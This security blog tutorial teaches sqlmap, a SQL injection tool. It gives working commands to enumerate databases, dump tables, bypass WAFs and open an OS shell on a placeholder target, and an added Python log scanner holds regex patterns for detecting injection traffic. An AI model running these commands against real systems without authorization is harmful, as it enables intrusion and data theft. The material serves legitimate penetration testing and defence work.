SQLMap: The Ultimate Guide to Automated SQL Injection

sqlmap is one of the most powerful open-source tools for automating the process of detecting and exploiting SQL injection vulnerabilities in web applications. Whether you're a penetration tester, bug bounty hunter, or cybersecurity enthusiast, mastering sqlmap can greatly enhance your ability to find security flaws in applications.

What is sqlmap?

sqlmap is an automated tool written in Python that helps security professionals identify and exploit SQL injection vulnerabilities. It supports a wide range of database management systems, including:

  • MySQL
  • PostgreSQL
  • Oracle
  • Microsoft SQL Server
  • SQLite
  • DB2
  • and more...

It can be used to:

  • Detect and exploit SQL injection vulnerabilities
  • Extract data from the database
  • Read and write files on the database server
  • Gain remote shell access

Installation

sqlmap comes pre-installed in many popular penetration testing distributions like Kali Linux. However, if you're on a different system or want to install it manually, follow these steps:

Requirements

  • Python 3.8 or later

Clone from GitHub

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

You can now run sqlmap directly:

python3 sqlmap.py -h

Or make an alias:

alias sqlmap="python3 /full/path/to/sqlmap-dev/sqlmap.py"

Basic Usage

Here are some essential examples to get started with sqlmap.

Test a URL for SQL Injection

python3 sqlmap.py -u "http://target.com/page.php?id=1" --batch

  • -u: Specifies the target URL.
  • --batch: Runs in non-interactive mode, using default answers.

Enumerate Databases

python3 sqlmap.py -u "http://target.com/page.php?id=1" --dbs

List Tables in a Specific Database

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name --tables

List Columns in a Table

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns

Dump Data from a Table

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

Advanced Features

Specify Parameter to Test

python3 sqlmap.py -u "http://target.com/page.php?id=1&name=admin" -p name

Use HTTP POST Request

python3 sqlmap.py -u "http://target.com/login.php" --data="username=admin&password=pass"

Bypass WAF

python3 sqlmap.py -u "http://target.com/page.php?id=1" --tamper=between

OS Command Execution (If injectable)

python3 sqlmap.py -u "http://target.com/page.php?id=1" --os-shell
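
From the defender's side, the requests generated by the commands above show up in web server access logs. The following is an added example, not code from the original article or from the sqlmap project: it scans constructed log lines for sqlmap's default User-Agent prefix and for common injection test patterns, including the NOT BETWEEN 0 AND rewrite produced by the between tamper script. The log lines, rule names and regular expressions are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2025:10:00:01 +0000] "GET /page.php?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.0#stable (https://sqlmap.org)"
203.0.113.9 - - [01/Jan/2025:10:00:02 +0000] "GET /page.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2025:10:00:03 +0000] "GET /page.php?id=1%20AND%209%20NOT%20BETWEEN%200%20AND%208 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2025:10:00:04 +0000] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Combined log format: ip, ident, user, [time], "method target proto", status, size, "referer", "agent"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Illustrative patterns (assumptions, not an exhaustive or official signature set).
QUERY_RULES = {
    "boolean-test": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "between-tamper": re.compile(r"\bnot\s+between\s+0\s+and\b", re.I),
    "time-delay": re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
}

def scan(log_text):
    """Return {client_ip: sorted list of rule names that fired for that client}."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, _method, target, _status, ua = m.groups()
        # Percent-decode the query string so encoded payloads match the rules.
        query = unquote_plus(urlsplit(target).query)
        fired = {name for name, rx in QUERY_RULES.items() if rx.search(query)}
        # sqlmap identifies itself in the User-Agent header unless told otherwise.
        if ua.lower().startswith("sqlmap/"):
            fired.add("sqlmap-user-agent")
        if fired:
            hits.setdefault(ip, set()).update(fired)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(rules))
```

The User-Agent header is client-controlled, so treat that rule as a convenience and rely on the payload rules for detection and on parameterized queries in the application for prevention.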

Ethical Warning

sqlmap should only be used on systems you have explicit permission to test. Unauthorized scanning and exploitation are illegal and unethical.


Final Thoughts

sqlmap simplifies the complex process of finding and exploiting SQL injections. By learning to use its full capabilities, you can become more effective in securing (or testing the security of) web applications.

For more details, refer to the official documentation: https://github.com/sqlmapproject/sqlmap

Happy hacking (responsibly)!


***
Note on Content Creation: This article was developed with the assistance of generative AI tools such as Gemini or ChatGPT. While these tools strive for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.